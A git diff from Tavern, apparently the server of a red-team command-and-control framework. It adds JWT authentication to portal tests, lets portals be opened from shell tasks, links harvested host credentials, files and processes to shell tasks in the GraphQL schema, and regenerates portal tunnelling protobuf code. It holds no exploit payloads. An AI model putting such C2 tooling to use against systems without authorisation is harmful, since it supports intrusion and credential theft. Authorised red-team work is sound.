a/tavern/internal/portals/benchmark_test.go b/tavern/internal/portals/benchmark_test.go index 0f19e905a..7a699dfe1 100644 --- a/tavern/internal/portals/benchmark_test.go +++ b/tavern/internal/portals/benchmark_test.go @@ -140,7 +140,12 @@ func BenchmarkPortalThroughput(b *testing.B) { // Send initial request with TaskID err = agentStream.Send(&c2pb.CreatePortalRequest{ - Context: &c2pb.TaskContext{TaskId: int64(taskEnt.ID)}, + Context: &c2pb.CreatePortalRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{ + TaskId: int64(taskEnt.ID), + Jwt: generateJWT(b, testPrivKey), + }, + }, }) require.NoError(b, err) diff --git a/tavern/internal/portals/integration_test.go b/tavern/internal/portals/integration_test.go index 525d2921c..f84be26dd 100644 --- a/tavern/internal/portals/integration_test.go +++ b/tavern/internal/portals/integration_test.go @@ -9,6 +9,7 @@ import ( "testing" "time" + "github.com/golang-jwt/jwt/v5" "github.com/stretchr/testify/require" "gocloud.dev/pubsub" _ "gocloud.dev/pubsub/mempubsub" @@ -37,6 +38,20 @@ type TestEnv struct { PortalClient portalpb.PortalClient Close func() EntClient *ent.Client + PrivKey ed25519.PrivateKey +} + +func generateJWT(t testing.TB, privKey ed25519.PrivateKey) string { + claims := jwt.MapClaims{ + "iat": time.Now().Unix(), + "exp": time.Now().Add(1 * time.Hour).Unix(), // Token expires in 1 hour + } + + token := jwt.NewWithClaims(jwt.SigningMethodEdDSA, claims) + signedToken, err := token.SignedString(privKey) + require.NoError(t, err) + + return signedToken } func SetupTestEnv(t *testing.T) *TestEnv { @@ -97,6 +112,7 @@ func SetupTestEnv(t *testing.T) *TestEnv { C2Client: c2Client, PortalClient: portalClient, EntClient: entClient, + PrivKey: testPrivKey, Close: func() { err := conn.Close() if err != nil { @@ -194,7 +210,12 @@ func TestPortalIntegration(t *testing.T) { // Send initial registration message err = c2Stream.Send(&c2pb.CreatePortalRequest{ - Context: &c2pb.TaskContext{TaskId: int64(taskID)}, + Context: &c2pb.CreatePortalRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{ + TaskId: int64(taskID), + Jwt: generateJWT(t, env.PrivKey), + }, + }, }) require.NoError(t, err) diff --git a/tavern/internal/portals/mux/benchmark_test.go b/tavern/internal/portals/mux/benchmark_test.go index 1e563c889..15d9c47a7 100644 --- a/tavern/internal/portals/mux/benchmark_test.go +++ b/tavern/internal/portals/mux/benchmark_test.go @@ -32,7 +32,7 @@ func BenchmarkMuxThroughput(b *testing.B) { // Setup Portals // Host Side - portalID, teardownCreate, err := m.CreatePortal(ctx, client, task.ID) + portalID, teardownCreate, err := m.CreatePortal(ctx, client, task.ID, 0) require.NoError(b, err) defer teardownCreate() diff --git a/tavern/internal/portals/mux/mux_create.go b/tavern/internal/portals/mux/mux_create.go index 195a97813..e932febf3 100644 --- a/tavern/internal/portals/mux/mux_create.go +++ b/tavern/internal/portals/mux/mux_create.go @@ -6,30 +6,51 @@ import ( "time" "realm.pub/tavern/internal/ent" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) // CreatePortal sets up a new portal for a task. -func (m *Mux) CreatePortal(ctx context.Context, client *ent.Client, taskID int) (int, func(), error) { +func (m *Mux) CreatePortal(ctx context.Context, client *ent.Client, taskID int, shellTaskID int) (int, func(), error) { // 1. DB: Create ent.Portal record (State: Open) - // We need to fetch Task dependencies (Beacon, Owner/Creator) to satisfy Portal constraints. - t, err := client.Task.Query(). - Where(task.ID(taskID)). - WithBeacon(). - WithQuest(func(q *ent.QuestQuery) { - q.WithCreator() - }). - Only(ctx) - if err != nil { - return 0, nil, fmt.Errorf("failed to query task %d: %w", taskID, err) - } - - creator := t.Edges.Quest.Edges.Creator - beacon := t.Edges.Beacon + var creator *ent.User + var beacon *ent.Beacon + + pCreate := client.Portal.Create() + + if taskID > 0 { + // We need to fetch Task dependencies (Beacon, Owner/Creator) to satisfy Portal constraints. + t, err := client.Task.Query(). + Where(task.ID(taskID)). + WithBeacon(). + WithQuest(func(q *ent.QuestQuery) { + q.WithCreator() + }). + Only(ctx) + if err != nil { + return 0, nil, fmt.Errorf("failed to query task %d: %w", taskID, err) + } - // Create Portal - pCreate := client.Portal.Create(). - SetTaskID(taskID) + creator = t.Edges.Quest.Edges.Creator + beacon = t.Edges.Beacon + pCreate.SetTaskID(taskID) + } else if shellTaskID > 0 { + st, err := client.ShellTask.Query(). + Where(shelltask.ID(shellTaskID)). + WithCreator(). + WithShell(func(s *ent.ShellQuery) { + s.WithBeacon() + }). + Only(ctx) + if err != nil { + return 0, nil, fmt.Errorf("failed to query shell task %d: %w", shellTaskID, err) + } + creator = st.Edges.Creator + beacon = st.Edges.Shell.Edges.Beacon + pCreate.SetShellTaskID(shellTaskID) + } else { + return 0, nil, fmt.Errorf("either taskID or shellTaskID must be provided") + } if beacon != nil { pCreate.SetBeacon(beacon) diff --git a/tavern/internal/portals/mux/mux_test.go b/tavern/internal/portals/mux/mux_test.go index 7d9591676..fb56566c9 100644 --- a/tavern/internal/portals/mux/mux_test.go +++ b/tavern/internal/portals/mux/mux_test.go @@ -91,7 +91,7 @@ func TestMux_CreatePortal(t *testing.T) { task := client.Task.Create().SetQuest(quest).SetBeacon(b).SaveX(ctx) // Updated call - portalID, teardown, err := m.CreatePortal(ctx, client, task.ID) + portalID, teardown, err := m.CreatePortal(ctx, client, task.ID, 0) require.NoError(t, err) assert.NotZero(t, portalID) defer teardown() @@ -197,3 +197,41 @@ func TestWithSubscriberBufferSize(t *testing.T) { m := New(WithSubscriberBufferSize(expected)) assert.Equal(t, expected, m.subs.bufferSize) } + +func TestMux_CreatePortal_ShellTask(t *testing.T) { + // Setup DB + client := enttest.Open(t, "sqlite3", "file:ent?mode=memory&cache=shared&_fk=1") + defer client.Close() + + // Setup Mux + m := New() + ctx := context.Background() + + // Create User, Host, Beacon + u := client.User.Create().SetName("testuser").SetOauthID("oauth").SetPhotoURL("photo").SaveX(ctx) + h := client.Host.Create().SetName("host").SetIdentifier("ident").SetPlatform(c2pb.Host_PLATFORM_LINUX).SaveX(ctx) + b := client.Beacon.Create().SetName("beacon").SetTransport(c2pb.Transport_TRANSPORT_HTTP1).SetHost(h).SaveX(ctx) + + // Create Shell and ShellTask + shell := client.Shell.Create().SetBeacon(b).SetOwner(u).SetData([]byte("")).SaveX(ctx) + st := client.ShellTask.Create().SetShell(shell).SetCreator(u).SetInput("test").SetStreamID("stream").SetSequenceID(1).SaveX(ctx) + + // Updated call + portalID, teardown, err := m.CreatePortal(ctx, client, 0, st.ID) + require.NoError(t, err) + assert.NotZero(t, portalID) + defer teardown() + + // Check DB + portals := client.Portal.Query().AllX(ctx) + require.Len(t, portals, 1) + p := portals[0] + if !p.ClosedAt.IsZero() { + assert.True(t, p.ClosedAt.IsZero(), "ClosedAt should be zero/nil") + } + + // Verify Relations + require.Equal(t, st.ID, p.QueryShellTask().OnlyIDX(ctx)) + require.Equal(t, b.ID, p.QueryBeacon().OnlyIDX(ctx)) + require.Equal(t, u.ID, p.QueryOwner().OnlyIDX(ctx)) +} diff --git a/tavern/internal/portals/portal_close_test.go b/tavern/internal/portals/portal_close_test.go index d28838796..55d44c434 100644 --- a/tavern/internal/portals/portal_close_test.go +++ b/tavern/internal/portals/portal_close_test.go @@ -28,7 +28,12 @@ func TestPortalClose(t *testing.T) { // Send initial registration message err = c2Stream.Send(&c2pb.CreatePortalRequest{ - Context: &c2pb.TaskContext{TaskId: int64(taskID)}, + Context: &c2pb.CreatePortalRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{ + TaskId: int64(taskID), + Jwt: generateJWT(t, env.PrivKey), + }, + }, }) require.NoError(t, err) diff --git a/tavern/internal/www/schema.graphql b/tavern/internal/www/schema.graphql index 432734f96..a9d3a42d4 100644 --- a/tavern/internal/www/schema.graphql +++ b/tavern/internal/www/schema.graphql @@ -1189,6 +1189,7 @@ input CreateHostCredentialInput { kind: HostCredentialKind! hostID: ID! taskID: ID + shellTaskID: ID } """ CreateLinkInput is used for create Link object. @@ -1554,6 +1555,10 @@ type HostCredential implements Node { Task that reported this credential. """ task: Task + """ + Shell Task that reported this credential. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -1705,6 +1710,11 @@ input HostCredentialWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ An edge in a connection. @@ -1760,7 +1770,11 @@ type HostFile implements Node { """ Task that reported this file. """ - task: Task! + task: Task + """ + Shell Task that reported this file. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -1964,6 +1978,11 @@ input HostFileWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ Ordering options for Host connections @@ -2050,7 +2069,11 @@ type HostProcess implements Node { """ Task that reported this process. """ - task: Task! + task: Task + """ + Shell Task that reported this process. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -2308,6 +2331,11 @@ input HostProcessWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ HostWhereInput is used for filtering Host objects. @@ -3573,6 +3601,18 @@ type ShellTask implements Node { The user who created this ShellTask """ creator: User! + """ + Credentials reported by this shell task + """ + reportedCredentials: [HostCredential!] + """ + Files reported by this shell task + """ + reportedFiles: [HostFile!] + """ + Processes reported by this shell task + """ + reportedProcesses: [HostProcess!] } """ A connection to a list of items. @@ -3796,6 +3836,21 @@ input ShellTaskWhereInput { """ hasCreator: Boolean hasCreatorWith: [UserWhereInput!] + """ + reported_credentials edge predicates + """ + hasReportedCredentials: Boolean + hasReportedCredentialsWith: [HostCredentialWhereInput!] + """ + reported_files edge predicates + """ + hasReportedFiles: Boolean + hasReportedFilesWith: [HostFileWhereInput!] + """ + reported_processes edge predicates + """ + hasReportedProcesses: Boolean + hasReportedProcessesWith: [HostProcessWhereInput!] } """ ShellWhereInput is used for filtering Shell objects. diff --git a/tavern/portals/portalpb/portal.pb.go b/tavern/portals/portalpb/portal.pb.go index 37ee51761..935db3683 100644 --- a/tavern/portals/portalpb/portal.pb.go +++ b/tavern/portals/portalpb/portal.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.11 -// protoc v4.25.1 +// protoc-gen-go v1.36.5 +// protoc v3.21.12 // source: portal.proto package portalpb @@ -535,48 +535,75 @@ func (x *OpenPortalResponse) GetMote() *Mote { var File_portal_proto protoreflect.FileDescriptor -const file_portal_proto_rawDesc = "" + - "\n" + - "\fportal.proto\x12\x06portal\"P\n" + - "\fBytesPayload\x12\x12\n" + - "\x04data\x18\x01 \x01(\fR\x04data\x12,\n" + - "\x04kind\x18\x02 \x01(\x0e2\x18.portal.BytesPayloadKindR\x04kind\"V\n" + - "\n" + - "TCPPayload\x12\x12\n" + - "\x04data\x18\x01 \x01(\fR\x04data\x12\x19\n" + - "\bdst_addr\x18\x02 \x01(\tR\adstAddr\x12\x19\n" + - "\bdst_port\x18\x03 \x01(\rR\adstPort\"V\n" + - "\n" + - "UDPPayload\x12\x12\n" + - "\x04data\x18\x01 \x01(\fR\x04data\x12\x19\n" + - "\bdst_addr\x18\x02 \x01(\tR\adstAddr\x12\x19\n" + - "\bdst_port\x18\x03 \x01(\rR\adstPort\"?\n" + - "\fShellPayload\x12\x14\n" + - "\x05input\x18\x01 \x01(\tR\x05input\x12\x19\n" + - "\bshell_id\x18\x02 \x01(\x03R\ashellId\"\xf1\x01\n" + - "\x04Mote\x12\x1b\n" + - "\tstream_id\x18\x01 \x01(\tR\bstreamId\x12\x15\n" + - "\x06seq_id\x18\x02 \x01(\x04R\x05seqId\x12&\n" + - "\x03udp\x18\x03 \x01(\v2\x12.portal.UDPPayloadH\x00R\x03udp\x12&\n" + - "\x03tcp\x18\x04 \x01(\v2\x12.portal.TCPPayloadH\x00R\x03tcp\x12,\n" + - "\x05bytes\x18\x05 \x01(\v2\x14.portal.BytesPayloadH\x00R\x05bytes\x12,\n" + - "\x05shell\x18\x06 \x01(\v2\x14.portal.ShellPayloadH\x00R\x05shellB\t\n" + - "\apayload\"R\n" + - "\x11OpenPortalRequest\x12\x1b\n" + - "\tportal_id\x18\x01 \x01(\x03R\bportalId\x12 \n" + - "\x04mote\x18\x02 \x01(\v2\f.portal.MoteR\x04mote\"6\n" + - "\x12OpenPortalResponse\x12 \n" + - "\x04mote\x18\x02 \x01(\v2\f.portal.MoteR\x04mote*\xce\x01\n" + - "\x10BytesPayloadKind\x12\"\n" + - "\x1eBYTES_PAYLOAD_KIND_UNSPECIFIED\x10\x00\x12\x1b\n" + - "\x17BYTES_PAYLOAD_KIND_DATA\x10\x01\x12\x1b\n" + - "\x17BYTES_PAYLOAD_KIND_PING\x10\x02\x12 \n" + - "\x1cBYTES_PAYLOAD_KIND_KEEPALIVE\x10\x03\x12\x1c\n" + - "\x18BYTES_PAYLOAD_KIND_TRACE\x10\x04\x12\x1c\n" + - "\x18BYTES_PAYLOAD_KIND_CLOSE\x10\x052S\n" + - "\x06Portal\x12I\n" + - "\n" + - "OpenPortal\x12\x19.portal.OpenPortalRequest\x1a\x1a.portal.OpenPortalResponse\"\x00(\x010\x01B#Z!realm.pub/tavern/portals/portalpbb\x06proto3" +var file_portal_proto_rawDesc = string([]byte{ + 0x0a, 0x0c, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x06, + 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x22, 0x50, 0x0a, 0x0c, 0x42, 0x79, 0x74, 0x65, 0x73, 0x50, + 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x01, + 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x12, 0x2c, 0x0a, 0x04, 0x6b, 0x69, + 0x6e, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x18, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, + 0x6c, 0x2e, 0x42, 0x79, 0x74, 0x65, 0x73, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4b, 0x69, + 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x22, 0x56, 0x0a, 0x0a, 0x54, 0x43, 0x50, 0x50, + 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x01, + 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x12, 0x19, 0x0a, 0x08, 0x64, 0x73, + 0x74, 0x5f, 0x61, 0x64, 0x64, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x07, 0x64, 0x73, + 0x74, 0x41, 0x64, 0x64, 0x72, 0x12, 0x19, 0x0a, 0x08, 0x64, 0x73, 0x74, 0x5f, 0x70, 0x6f, 0x72, + 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x07, 0x64, 0x73, 0x74, 0x50, 0x6f, 0x72, 0x74, + 0x22, 0x56, 0x0a, 0x0a, 0x55, 0x44, 0x50, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x12, + 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, + 0x74, 0x61, 0x12, 0x19, 0x0a, 0x08, 0x64, 0x73, 0x74, 0x5f, 0x61, 0x64, 0x64, 0x72, 0x18, 0x02, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x07, 0x64, 0x73, 0x74, 0x41, 0x64, 0x64, 0x72, 0x12, 0x19, 0x0a, + 0x08, 0x64, 0x73, 0x74, 0x5f, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0d, 0x52, + 0x07, 0x64, 0x73, 0x74, 0x50, 0x6f, 0x72, 0x74, 0x22, 0x3f, 0x0a, 0x0c, 0x53, 0x68, 0x65, 0x6c, + 0x6c, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x14, 0x0a, 0x05, 0x69, 0x6e, 0x70, 0x75, + 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x69, 0x6e, 0x70, 0x75, 0x74, 0x12, 0x19, + 0x0a, 0x08, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x5f, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x03, + 0x52, 0x07, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x49, 0x64, 0x22, 0xf1, 0x01, 0x0a, 0x04, 0x4d, 0x6f, + 0x74, 0x65, 0x12, 0x1b, 0x0a, 0x09, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d, 0x5f, 0x69, 0x64, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d, 0x49, 0x64, 0x12, + 0x15, 0x0a, 0x06, 0x73, 0x65, 0x71, 0x5f, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x04, 0x52, + 0x05, 0x73, 0x65, 0x71, 0x49, 0x64, 0x12, 0x26, 0x0a, 0x03, 0x75, 0x64, 0x70, 0x18, 0x03, 0x20, + 0x01, 0x28, 0x0b, 0x32, 0x12, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x55, 0x44, 0x50, + 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x48, 0x00, 0x52, 0x03, 0x75, 0x64, 0x70, 0x12, 0x26, + 0x0a, 0x03, 0x74, 0x63, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x12, 0x2e, 0x70, 0x6f, + 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x54, 0x43, 0x50, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x48, + 0x00, 0x52, 0x03, 0x74, 0x63, 0x70, 0x12, 0x2c, 0x0a, 0x05, 0x62, 0x79, 0x74, 0x65, 0x73, 0x18, + 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x42, + 0x79, 0x74, 0x65, 0x73, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x48, 0x00, 0x52, 0x05, 0x62, + 0x79, 0x74, 0x65, 0x73, 0x12, 0x2c, 0x0a, 0x05, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x18, 0x06, 0x20, + 0x01, 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x53, 0x68, 0x65, + 0x6c, 0x6c, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x48, 0x00, 0x52, 0x05, 0x73, 0x68, 0x65, + 0x6c, 0x6c, 0x42, 0x09, 0x0a, 0x07, 0x70, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x22, 0x52, 0x0a, + 0x11, 0x4f, 0x70, 0x65, 0x6e, 0x50, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, + 0x73, 0x74, 0x12, 0x1b, 0x0a, 0x09, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x5f, 0x69, 0x64, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x08, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x49, 0x64, 0x12, + 0x20, 0x0a, 0x04, 0x6d, 0x6f, 0x74, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0c, 0x2e, + 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x4d, 0x6f, 0x74, 0x65, 0x52, 0x04, 0x6d, 0x6f, 0x74, + 0x65, 0x22, 0x36, 0x0a, 0x12, 0x4f, 0x70, 0x65, 0x6e, 0x50, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x52, + 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x20, 0x0a, 0x04, 0x6d, 0x6f, 0x74, 0x65, 0x18, + 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0c, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x4d, + 0x6f, 0x74, 0x65, 0x52, 0x04, 0x6d, 0x6f, 0x74, 0x65, 0x2a, 0xce, 0x01, 0x0a, 0x10, 0x42, 0x79, + 0x74, 0x65, 0x73, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4b, 0x69, 0x6e, 0x64, 0x12, 0x22, + 0x0a, 0x1e, 0x42, 0x59, 0x54, 0x45, 0x53, 0x5f, 0x50, 0x41, 0x59, 0x4c, 0x4f, 0x41, 0x44, 0x5f, + 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, + 0x10, 0x00, 0x12, 0x1b, 0x0a, 0x17, 0x42, 0x59, 0x54, 0x45, 0x53, 0x5f, 0x50, 0x41, 0x59, 0x4c, + 0x4f, 0x41, 0x44, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x44, 0x41, 0x54, 0x41, 0x10, 0x01, 0x12, + 0x1b, 0x0a, 0x17, 0x42, 0x59, 0x54, 0x45, 0x53, 0x5f, 0x50, 0x41, 0x59, 0x4c, 0x4f, 0x41, 0x44, + 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x50, 0x49, 0x4e, 0x47, 0x10, 0x02, 0x12, 0x20, 0x0a, 0x1c, + 0x42, 0x59, 0x54, 0x45, 0x53, 0x5f, 0x50, 0x41, 0x59, 0x4c, 0x4f, 0x41, 0x44, 0x5f, 0x4b, 0x49, + 0x4e, 0x44, 0x5f, 0x4b, 0x45, 0x45, 0x50, 0x41, 0x4c, 0x49, 0x56, 0x45, 0x10, 0x03, 0x12, 0x1c, + 0x0a, 0x18, 0x42, 0x59, 0x54, 0x45, 0x53, 0x5f, 0x50, 0x41, 0x59, 0x4c, 0x4f, 0x41, 0x44, 0x5f, + 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x54, 0x52, 0x41, 0x43, 0x45, 0x10, 0x04, 0x12, 0x1c, 0x0a, 0x18, + 0x42, 0x59, 0x54, 0x45, 0x53, 0x5f, 0x50, 0x41, 0x59, 0x4c, 0x4f, 0x41, 0x44, 0x5f, 0x4b, 0x49, + 0x4e, 0x44, 0x5f, 0x43, 0x4c, 0x4f, 0x53, 0x45, 0x10, 0x05, 0x32, 0x53, 0x0a, 0x06, 0x50, 0x6f, + 0x72, 0x74, 0x61, 0x6c, 0x12, 0x49, 0x0a, 0x0a, 0x4f, 0x70, 0x65, 0x6e, 0x50, 0x6f, 0x72, 0x74, + 0x61, 0x6c, 0x12, 0x19, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x4f, 0x70, 0x65, 0x6e, + 0x50, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1a, 0x2e, + 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x4f, 0x70, 0x65, 0x6e, 0x50, 0x6f, 0x72, 0x74, 0x61, + 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x28, 0x01, 0x30, 0x01, 0x42, + 0x23, 0x5a, 0x21, 0x72, 0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, + 0x65, 0x72, 0x6e, 0x2f, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x73, 0x2f, 0x70, 0x6f, 0x72, 0x74, + 0x61, 0x6c, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, +}) var ( file_portal_proto_rawDescOnce sync.Once diff --git a/tavern/portals/portalpb/portal_grpc.pb.go b/tavern/portals/portalpb/portal_grpc.pb.go index 1afa11094..9b0bd90f3 100644 --- a/tavern/portals/portalpb/portal_grpc.pb.go +++ b/tavern/portals/portalpb/portal_grpc.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go-grpc. DO NOT EDIT. // versions: -// - protoc-gen-go-grpc v1.6.1 -// - protoc v4.25.1 +// - protoc-gen-go-grpc v1.3.0 +// - protoc v3.21.12 // source: portal.proto package portalpb @@ -15,8 +15,8 @@ import ( // This is a compile-time assertion to ensure that this generated file // is compatible with the grpc package it is being compiled against. -// Requires gRPC-Go v1.64.0 or later. -const _ = grpc.SupportPackageIsVersion9 +// Requires gRPC-Go v1.62.0 or later. +const _ = grpc.SupportPackageIsVersion8 const ( Portal_OpenPortal_FullMethodName = "/portal.Portal/OpenPortal" @@ -26,7 +26,7 @@ const ( // // For semantics around ctx use and closing/ending streaming RPCs, please refer to https://pkg.go.dev/google.golang.org/grpc/?tab=doc#ClientConn.NewStream. type PortalClient interface { - OpenPortal(ctx context.Context, opts ...grpc.CallOption) (grpc.BidiStreamingClient[OpenPortalRequest, OpenPortalResponse], error) + OpenPortal(ctx context.Context, opts ...grpc.CallOption) (Portal_OpenPortalClient, error) } type portalClient struct { @@ -37,39 +37,54 @@ func NewPortalClient(cc grpc.ClientConnInterface) PortalClient { return &portalClient{cc} } -func (c *portalClient) OpenPortal(ctx context.Context, opts ...grpc.CallOption) (grpc.BidiStreamingClient[OpenPortalRequest, OpenPortalResponse], error) { +func (c *portalClient) OpenPortal(ctx context.Context, opts ...grpc.CallOption) (Portal_OpenPortalClient, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) stream, err := c.cc.NewStream(ctx, &Portal_ServiceDesc.Streams[0], Portal_OpenPortal_FullMethodName, cOpts...) if err != nil { return nil, err } - x := &grpc.GenericClientStream[OpenPortalRequest, OpenPortalResponse]{ClientStream: stream} + x := &portalOpenPortalClient{ClientStream: stream} return x, nil } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type Portal_OpenPortalClient = grpc.BidiStreamingClient[OpenPortalRequest, OpenPortalResponse] +type Portal_OpenPortalClient interface { + Send(*OpenPortalRequest) error + Recv() (*OpenPortalResponse, error) + grpc.ClientStream +} + +type portalOpenPortalClient struct { + grpc.ClientStream +} + +func (x *portalOpenPortalClient) Send(m *OpenPortalRequest) error { + return x.ClientStream.SendMsg(m) +} + +func (x *portalOpenPortalClient) Recv() (*OpenPortalResponse, error) { + m := new(OpenPortalResponse) + if err := x.ClientStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} // PortalServer is the server API for Portal service. // All implementations must embed UnimplementedPortalServer -// for forward compatibility. +// for forward compatibility type PortalServer interface { - OpenPortal(grpc.BidiStreamingServer[OpenPortalRequest, OpenPortalResponse]) error + OpenPortal(Portal_OpenPortalServer) error mustEmbedUnimplementedPortalServer() } -// UnimplementedPortalServer must be embedded to have -// forward compatible implementations. -// -// NOTE: this should be embedded by value instead of pointer to avoid a nil -// pointer dereference when methods are called. -type UnimplementedPortalServer struct{} +// UnimplementedPortalServer must be embedded to have forward compatible implementations. +type UnimplementedPortalServer struct { +} -func (UnimplementedPortalServer) OpenPortal(grpc.BidiStreamingServer[OpenPortalRequest, OpenPortalResponse]) error { - return status.Error(codes.Unimplemented, "method OpenPortal not implemented") +func (UnimplementedPortalServer) OpenPortal(Portal_OpenPortalServer) error { + return status.Errorf(codes.Unimplemented, "method OpenPortal not implemented") } func (UnimplementedPortalServer) mustEmbedUnimplementedPortalServer() {} -func (UnimplementedPortalServer) testEmbeddedByValue() {} // UnsafePortalServer may be embedded to opt out of forward compatibility for this service. // Use of this interface is not recommended, as added methods to PortalServer will @@ -79,22 +94,34 @@ type UnsafePortalServer interface { } func RegisterPortalServer(s grpc.ServiceRegistrar, srv PortalServer) { - // If the following call panics, it indicates UnimplementedPortalServer was - // embedded by pointer and is nil. This will cause panics if an - // unimplemented method is ever invoked, so we test this at initialization - // time to prevent it from happening at runtime later due to I/O. - if t, ok := srv.(interface{ testEmbeddedByValue() }); ok { - t.testEmbeddedByValue() - } s.RegisterService(&Portal_ServiceDesc, srv) } func _Portal_OpenPortal_Handler(srv interface{}, stream grpc.ServerStream) error { - return srv.(PortalServer).OpenPortal(&grpc.GenericServerStream[OpenPortalRequest, OpenPortalResponse]{ServerStream: stream}) + return srv.(PortalServer).OpenPortal(&portalOpenPortalServer{ServerStream: stream}) +} + +type Portal_OpenPortalServer interface { + Send(*OpenPortalResponse) error + Recv() (*OpenPortalRequest, error) + grpc.ServerStream +} + +type portalOpenPortalServer struct { + grpc.ServerStream } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type Portal_OpenPortalServer = grpc.BidiStreamingServer[OpenPortalRequest, 